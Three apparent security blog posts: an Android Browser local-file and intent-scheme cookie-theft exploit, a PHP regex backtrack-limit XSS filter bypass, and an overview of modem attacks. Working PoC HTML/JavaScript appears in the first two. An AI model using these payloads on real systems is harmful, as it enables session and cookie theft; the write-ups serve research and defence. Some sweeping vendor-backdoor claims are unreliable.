Android Browser Cross Scheme Data Exposure + Intent Scheme Attack


tl;dr This exploit targets an issue present in Android Browser < 4.4 and several other Android browsers that allows an attacker to read the SQLite cookie database file, exposing all cookies. Along with it, we also discuss a Cross Scheme Data Exposure attack in Android < 4.4.

Introduction

During my research on AOSP (Stock Browser), I found out that it is possible to open links to local files using the file:// protocol from a webpage by selecting "Open Link in New tab" from the context menu. This in itself does not represent a vulnerability unless there is a way to read local files and retrieve them remotely. However, what caught my attention is that this is not permitted by default in browsers such as Chrome, Firefox, Opera etc.

The following screenshot demonstrates the error which is obtained when trying to access a local file from context menu.


Attack Plan 

In order to exploit this issue, the following was the attack plan we came up with:

i) The user visits Attacker.com.
ii) Attacker.com forces a download (exploit.html) in the victim's browser using the Content-Disposition header. The purpose of exploit.html is to read local files and send them back to the attacker.
iii) The victim opens a link by selecting "Open Link in New tab", which opens the local file exploit.html that was forced as a download.
iv) Our file exploit.html then reads other local files and sends them back to the attacker.

In order to write an effective exploit for the attack, I teamed up with Haru Sugiyama, a security researcher from Japan. He came up with the following POC:

http://133.242.134.241/firefox/test.html

Upon accessing the above page from the Android browser, it would first force the download of the file "exploit.html". Both Firefox and the Android browser save files to '/sdcard/Download/exploit.html' if an sdcard is available. The exploit.html file would then try reading the other local files. However, this was not as easy as it looked at first sight. Let's first talk about how the results from Android Gingerbread were different from Jellybeans.

Android Gingerbread: Observations

In the case of the Android Gingerbread emulator build 2.3, we are easily able to read other local files. This represents a vulnerability in the browser, as it effectively allows a website to perform cross-domain data theft, violating the same-origin policy. The impact, however, is not large, as roughly 11.4% of users now use Android Gingerbread, and they are dying out slowly, just like Windows XP.



Android Jellybeans: Observations

In the case of Jellybeans, we found out that a local file was not able to read other local files. We then tried our old null byte trick and it worked like a charm.

The following is the POC:

<button onclick="exploit()">Read iframe</button>
<button onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')">Try \u0000</button>
<iframe src="file:/default.prop" name="test" style='width:100%;height:200'></iframe>
<script>
function exploit() {
  var iframe = document.getElementsByTagName('iframe')[0];
  try{
    alert("Try to read local file.");
    alert("contentWindow:"+iframe.contentWindow);
    alert("document:"+iframe.contentWindow.document);
    alert("body:"+iframe.contentWindow.document.body);
    alert("innerHTML:"+iframe.contentWindow.document.body.innerHTML);
  } catch(e) {
    alert(e);
  }
}
</script>

However, due to the discovery of CVE-2014-6041, the null byte issue was already patched, and the above exploit did not work on patched devices.

Intent URL Scheme Attack

Based upon our above findings, it was concluded that in Android Jellybeans access to local files was not an issue, because a local file could not read other local files. However, Joe Vennix from the Metasploit team came up with a stronger way to exploit it by abusing the intent scheme. The following paper -> http://www.mbsd.jp/Whitepaper/IntentScheme.pdf describes a potential way of exploiting this issue. The following is the POC described in the paper:

The idea behind the attack vector is to save a cookie containing JavaScript code and trick the victim into opening the SQLite database file. Upon viewing, the injected JavaScript would be executed in the context of the cookie file and would grab the rest of the cookies from the database file. Following is the basic POC, which when executed would read the entire webviewCookiesChromium.db file.

<!doctype html>
      <html>
        <head><meta name="viewport" content="width=device-width, user-scalable=no" /></head>
        <body style='width:100%;font-size: 16px;'>
          <a href='file:///data/data/com.android.browser/databases/webviewCookiesChromium.db'>
            Redirecting... To continue, tap and hold here, then choose "Open in a new tab"
          </a>
          <script>

           document.cookie='x=<img src=x onerror=prompt(document.body.innerHTML)>';   

</script>
        </body>
      </html>

Joe has created a Metasploit module which automates the process of stealing the cookies and sending them back to you. Since the db file also contains httponly cookies, this attack is quite dangerous.

Steps to Reproduce with Metasploit



The following screenshots would walk you through the process of exploiting and retrieving the cookies:

Step 1 - Setting up the Module


Step 2 - Stealing The Cookies


All you need to do is sit back and watch the cookies coming to you.




Step 3 - Enjoy



Patch

Access to the data directory was tightened back in Feb 2014; however, due to the Android patch policies, the patch did not make it to most of the vendors.

Credits

I would like to thank Tod Beardsley and Joe Vennix from the Metasploit team for their extensive support with analyzing the issue and helping to coordinate with Google effectively, as well as Haru Sugiyama for his help and support.

Bad Meets evil - PHP meets Regular Expressions

This article briefly discusses why Regular Expressions might not be suitable for filters and how things can turn miserably bad when PHP is used with Regular Expressions. The post then continues with the write-up of a relevant scenario-based challenge, and finally concludes with the author’s opinion on the topic.

Common pitfalls of Regular expressions

RegEx (Regular expressions) are commonly used for pattern matching, searching and replacing, which are handy for string manipulation in different supported back-end programming languages. In reality, there are a ton of filters [1] which rely heavily upon RegEx to filter out malicious inputs.

We have already witnessed [2] why RegEx might not be considered a good idea. However, one might argue that it is the programmers' fault (or rather choice of options): they do not consider all the possible test cases for an attack surface scenario. I simply couldn't disagree with this statement. In fact, Microsoft's current XSS filter [3] is a good example of it. Following are some of the problems:

Problem#1: Under the hood, the filter currently employs a very long RegEx which, surprisingly, has no public bypasses available. But one should not forget that it actually evolved from previous vulnerable versions, and one really must have the patience to write such a tedious RegEx.

Problem#2: The second problem is that even a functional RegEx could lead to different vulnerabilities. Yes, I'm talking about ReDoS (Regular Expression Denial of Service), an attack which surfaces in badly constructed RegEx, wherein attackers could compromise the availability of the application with a specially crafted input.

In the long run, from the programmer’s perspective, it might be a bit tedious for developers to handle both functionality and security at once. Therefore, we conclude that RegEx (Regular Expressions) should be considered evil when heavily used in filters.

PHP + RegEx = ?

PHP itself is not bad; however, when combined with RegEx it becomes bad. Most of the commonly used RegEx functions in PHP (i.e. preg_*) are based upon the PCRE library. The engine itself is not only deficient in terms of performance, but it also opens a potential gateway to ReDoS vulnerabilities.

As we can see from a ReDoS issue in PHP's famous framework CodeIgniter [4], a harmless-looking RegEx (e.g. `/[a-z]+=/`) can cause serious performance damage. More importantly, there is a fatal design flaw. In order to prevent resource exhaustion, PHP is so smart that it provides an option called pcre.backtrack_limit. What it does is limit the number of backtracks (backtracking is a common cause of ReDoS). But what if the number of backtracks reaches the limit? Well, it just doesn't care. In other words, it is possible to evade specific protections when the conditions are met.

The write-up


In order to demonstrate how serious the problem could be, I ended up creating a mini XSS puzzle in the kcal.pw series. Here is the sample code for this puzzle:
$xss = $_POST['xss'];
if (preg_match('/<(?:\w+)\W+?[\w]/', $xss)) {
    echo '<p>I don\'t think so</p>';
} else {
    echo $xss;
}

Let’s take a look at the following RegEx and see what it does: `/<(?:\w+)\W+?[\w]/`

It detects any presence of an open tag, followed by any potential attributes, separators and whatsoever. Although the RegEx looks specious, it is technically sufficient for preventing XSS in HTML context. If you look closely, you will find the RegEx utilizes non-greedy matching, which requires backtracking. As mentioned before, PHP has a default backtrack limit (pcre.backtrack_limit, 100000). However, PHP favours "fail silently", which makes preg_match simply return false instead of throwing an exception when the input reaches the limit. As a result, submitting a long enough payload will bypass the filter.

Let’s try using the preg_match function to test the regular expression with a large number of repeated characters:
var_dump(preg_match('/<(?:\w+)\W+?[\w]/', '<a/'.str_repeat('\\', 1000000).'/a'));

The test is simple: it simulates input being matched against the vulnerable RegEx, with a single character (a backslash here) repeated 1000000 times. And it does return false.
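The fail-open check described above, next to a fail-closed version of the same check, as an added example (not the puzzle's own code). The function names and sample inputs are constructed for illustration, PHP 7+ is assumed, and the two `ini_set` calls are an assumption that recreates the 100000 limit quoted above. Whether a given input actually reaches the limit depends on the PCRE version and these settings, which is why the strict check handles `false` explicitly.

```php
<?php
// Added example, not the puzzle's code. Names and sample inputs are constructed.

const TAG_RE = '/<(?:\w+)\W+?[\w]/';   // the pattern from the puzzle

// Assumption: interpreter matching with the 100000 limit the article quotes.
ini_set('pcre.jit', '0');
ini_set('pcre.backtrack_limit', '100000');

// The puzzle's logic: any falsy result (0 or false) lets the input through.
function check_truthy(string $input): bool
{
    return !preg_match(TAG_RE, $input);
}

// Fail closed: only an explicit 0 ("no match") lets the input through.
function check_strict(string $input): bool
{
    $result = preg_match(TAG_RE, $input);
    if ($result === false) {
        // Engine error (e.g. PREG_BACKTRACK_LIMIT_ERROR): log it and reject.
        error_log('tag filter: preg error ' . preg_error_name(preg_last_error()));
        return false;
    }
    return $result === 0;
}

// Translate a preg_last_error() code into its constant name.
function preg_error_name(int $code): string
{
    $names = [
        PREG_NO_ERROR              => 'PREG_NO_ERROR',
        PREG_INTERNAL_ERROR        => 'PREG_INTERNAL_ERROR',
        PREG_BACKTRACK_LIMIT_ERROR => 'PREG_BACKTRACK_LIMIT_ERROR',
        PREG_RECURSION_LIMIT_ERROR => 'PREG_RECURSION_LIMIT_ERROR',
        PREG_BAD_UTF8_ERROR        => 'PREG_BAD_UTF8_ERROR',
        PREG_BAD_UTF8_OFFSET_ERROR => 'PREG_BAD_UTF8_OFFSET_ERROR',
        PREG_JIT_STACKLIMIT_ERROR  => 'PREG_JIT_STACKLIMIT_ERROR',
    ];
    return $names[$code] ?? "code $code";
}

// Constructed inputs: plain text, a short tag, and the article's long test string.
$samples = [
    'plain text' => 'hello world',
    'short tag'  => '<b onclick=x>',
    'long run'   => '<a/' . str_repeat('\\', 1000000) . '/a',
];

foreach ($samples as $label => $input) {
    $raw = preg_match(TAG_RE, $input);
    $err = preg_error_name(preg_last_error());
    printf(
        "%-10s raw=%-5s error=%-26s truthy:%-6s strict:%s\n",
        $label,
        var_export($raw, true),
        $err,
        check_truthy($input) ? 'accept' : 'reject',
        check_strict($input) ? 'accept' : 'reject'
    );
}
```

Any row where `raw` is `false` is a case the truthiness check accepts and the strict check rejects; the `error_log` line gives defenders a signal that someone is feeding the filter inputs that break the engine.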

Proof Of Concept

The following is a complete proof of concept that would generate alert(1) on the challenge domain:
<form action="http://s30003-101809-vkp.tarentum.hack.me/index.php" method="post">
    <textarea style="display: none" name="xss"></textarea>
  </form>
<script>
document.forms[0].xss.value = '<script' + Array(999999).join('/') + '>alert(1)<\/script>';
document.forms[0].submit();
</script>

Conclusion


The suggestion for defense is to use RegEx only if absolutely necessary. More importantly, avoid writing bad RegEx. Although there are some tools which claim to analyze potential ReDoS problems, the best practice is again to substantially limit the use of RegEx. Finally, this is a take-away (which is also my “right” rule of thumb):

 If a filter relies too heavily on a Regex, then it might probably fail its job in terms of security!

About The Author


This article has been written by "File Descriptor"; he prefers to be called an "XSS Jigsaw" instead of his real name, which he prefers to keep secret. FD has decided to dedicate his life to creating and solving XSS challenges, and that is what, in my opinion, a hacker really is: a problem-solving expert. You can follow him at @filedescriptor

References

1. http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/
2. http://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags
3. http://www.cloudscan.me/2011/09/mshtmldll-ie-xss-filter-evasion.html
4. https://github.com/bcit-ci/CodeIgniter/issues/3123

Common Attacks Against Modems

0x01: Introduction to Modems

The term DSL modem is technically used to describe "a modem which connects to a single computer, through a USB port or is installed in a computer PCI slot". The more common DSL router, which combines the function of a DSL modem and a home router, is a standalone device which can be connected to multiple computers through multiple Ethernet ports or an integral wireless access point. Also called a "residential gateway", a DSL router usually manages the connection and sharing of the DSL service in a home or small office network.


Most consumer DSL lines use one of several variations and varieties of Asymmetric DSL (ADSL). The "asymmetric" DSL here means that more of the bandwidth of the line is dedicated to downstream (download) data than upstream (upload) data. Hence, download rates are faster than upload rates since most users download much larger quantities of data than they actually upload. Because the telephone lines were never designed to carry such high frequency signals, DSL is distance-sensitive. The farther away from the switching center the modem is, the longer the telephone wires, the weaker the signal, and the lower the data rate that the modem can achieve. Users in metropolitan areas, close to switching centers, may have access to higher rate service, up to 8 Mbit/s than the expected rate for the same service in remote areas.

Reference: en.wikipedia.org/wiki/DSL_modem

0x02: Market Share

The modem manufacturers are mostly China-based. Research shows that companies like ZTE & Huawei are doing very well and have gained enterprise router share in China over the past year. In China, ZTE was placed as the third player in 2013 and 2014, with a more dizzying rise this year than the popular Cisco (which happens to be more secure). This is also due to the fact that Cisco's products are very costly and difficult for home users to afford.





0x03: Backups & Backdoors

All modems include backup files, mainly because of the need to recover the modem to its original state after a reset. However, knowing the direct link to the backup file puts the modem directly in danger. All an attacker has to do is request the backup file and view it; mostly this is juicy plain-text info that contains passwords and ISP configurations.

Knowing this, however, some vendors try to encrypt the contents of these files, so downloading them would be useless for the attacker. But this isn’t entirely impossible, as lots of vendors tend to use weak encryption mechanisms to encrypt the backup file, and research done by white hats such as Osanda Malith shows that. He, for example, provided a PoC tool used to decrypt these rom-0 (backup) files from most modems, including ZTE and TP-Link.

Most of the Chinese vendors such as ZTE are banned from the US: one, because they are incredibly insecure, and two, because they put malicious backdoors in to snoop and eavesdrop on individuals and organizations.

Lots of trusted companies such as TP-Link, Huawei and other Chinese companies have a record of placing backdoors in their products. These backdoors are normally in the form of open ports which, on connecting, would provide a reverse shell. The ports are often found to be high-numbered to make them harder to detect.

One such example can be found here. This lets them capture sensitive files and sometimes sell it for residing countries. This strategy is a great one for governments to spy on their citizens, as well as a part of a cyber attack against a particular country. So for example: a country could sell cheap backdoored modems to a target country, and in case the modems end up being used on military and sensitive systems, then they have hit a jackpot.

0x04: Default Configuration details and Hardcoded Credentials

Apparently, most if not all modems come with very easy-to-guess password configurations. In fact, most of them are identical, like username: admin and password: admin. Most people do not change the configuration details, and most ISPs leave this as default.

This, amazingly, is good news for malicious users, because all they have to do is know the vendor, and they can get their hands on it easily using sites such as http://www.routerpasswords.com/ to extract information.

0x05: XSRF and XSS

These are two of the most common flaws in the history of web security. Most ZTE modems do not use anti-XSRF tokens (used to prevent CSRF attacks) on any sensitive request.

XSS is even worse, because if one found an XSS flaw in any modem (which is likely), he can send that link to a logged-in administrator and perform any action on behalf of the admin; this could be done by stealing the XSRF token. An XSS could also allow session hijacking and other browser attacks.

XSRF flaws are more commonly found in modems than XSS, due to the fact that modems use HTTP authentication most of the time. So headers are mainly used in communications protocols to communicate with one another. This makes it harder for the modem to detect and create anti-CSRF tokens other than to compare it.

Because of these, or just because of careless development, it is sometimes possible to trick admins into changing passwords, issuing commands or easing access.

0x06: Social Engineering

What would you say if a blocked number called you and told you that she is from your ISP and she needs your credentials in order to add/maintain the new and revised 3G technology in your modem? Or even that she needs to fix security flaws in your modem? You surely would never expect this to be a troll. I mean, why would you? And then the next thing you know, she has snooped your configuration password. Knowing this password could mean (since lots of people use the same passwords) that she got access to your email password, financial account, etc.

0x07: Exploit Databases

Many exploit databases hold juicy info about modems, including default configurations, XSRF/XSS/LFI flaws, logical issues and backdoors. So all you need to do is find the modem version and search exploit databases such as exploit-db.com, 1337day.com etc.

So say you found an exploit against a previous version of a modem, but not for the exact version. This doesn't necessarily mean yours isn’t vulnerable to the particular exploit you found. In fact, most vendors use the same architecture to construct the web architecture of their modems. So one XSS on one model could mean XSS on all of that vendor's other modems.

0x08: Eavesdropping

The lack of SSL usually means bad luck for modems, especially if they are for office/public usage, because the admin is always at risk when accessing any file from the modem. The reason is that it is very easy to sniff ongoing traffic with tools like Wireshark.

The fact that modems use login protocols like HTTP authentication puts them in more danger, because when any file is requested, the modem requests the authentication header and the admin responds (mostly in Base64 form), and an attacker can easily sniff this and decode the communication.

Even when using SSL (note that very few modems use it), it can still be insecure and even pose more risk. Recently, a lot of attacks have been identified against SSL protocols, Heartbleed and POODLE to name a few.

0x09: Denial Of Service

Denial of Service is one of the most annoying things I can think of, next to a logout CSRF. People with bad intentions can use this type of attack to knock a modem out of delivering internet, and sometimes even make the modem reset itself.

This is really crazy for people trying to do their job. The fact that this attack can easily be turned into an untraceable attack can make your business day a big pain, just because you chose to use a vulnerable modem.

Most modems by design don’t hold more HDD than 25MB and hold less than 2MB of RAM, with no DoS protections. This usually means they can handle only a limited amount of data, taking a huge amount of time. All an attacker has to do is send more requests than the modem can handle, exhausting its memory and resulting in a DoS.

0x10: Lack Of Updates

Modem users seldom receive updates for modems when critical vulnerabilities have been identified in the wild, and a lot of modems don't really have a mechanism for providing OTA (Over the Air) updates. A lot of the time, users have to upgrade the firmware manually, which of course is not possible for people with little or no technical knowledge.

0xA: Suggestions

  1. If you are an admin/user of a modem, try not to stay logged in, to make attacks like XSRF, XSS and ClickJacking less effective.
  2. Try doing a little research about the modem model you are trying to buy. Google exploits for it, and check whether it uses a secure connection (TLS). If it is vulnerable, why should you buy it? Look for another.
  3. Try disabling remote access to decrease the attacker’s chance of gaining access over the internet; since most modem exploits require LAN access, it’s a good thing to disable remote Telnet, web and even FTP access to the modem.
  4. Limit physical access. Because most modems have a physical hard reset key/button, they should remain in a secured environment where only authorized people can reach them.

About the Author:

This article is a guest post by Paulos Yibelo. Yibelo is the newest member of the RHA family. He is a full-time PHP coder, and most of his research involves application security. In his free time he loves writing articles related to application security: http://paulosyibelo.blogspot.com/